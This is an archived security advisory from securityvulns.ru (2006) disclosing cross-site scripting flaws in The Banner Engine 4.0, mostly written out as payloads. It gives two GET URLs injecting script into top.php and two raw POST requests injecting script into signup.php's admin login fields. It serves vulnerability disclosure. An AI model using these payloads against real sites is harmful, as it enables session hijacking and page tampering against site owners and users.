Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  galleria <= 1.0 Remote File Inclusion Vulnerability

  [SA20936] Vincent LECLERCQ News Cross-Site Scripting and SQL Injection

  [SA20901] FineShop Cross-Site Scripting and SQL Injection

  [SA20884] MKPortal "ind" Local File Inclusion Vulnerability

From:securityconnection_(at)_gmail.com <securityconnection_(at)_gmail.com>
Date:04.07.2006
Subject:TBE 4.0 XSS

The Banner Engine - tbe4.0
Native Solutions
--------------------------
Cross Site Scripting (XSS)
--------------------------
http://target.xx/top.php?action=search&catid=catid&text=%3Cscript%
3Ealert
(%22Ellipsis+Security+Test%22)%3C/script%3E
http://target.xx/top.php?action=search&catid=catid&text=%3Cimg%20
src=%22javascript
:
alert('Ellipsis+Security+Test');%22%3E
---
POST http://target.xx:80/signup.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 127
adminpass="><script>alert(/Ellipsis+Security+Test/)</scr
ipt>&adminlogin=1&action=1&login=1&password=1&bid=1&bn
umr=1
---
POST http://target.xx:80/signup.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 127
adminpass=1&adminlogin="><script>alert(/Ellipsis+Security+T
est/)</script>&action=1&login=1&password=1&bid=1&bn
umr=1
-----------------
Ellipsis Security
http://ellsec.org

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru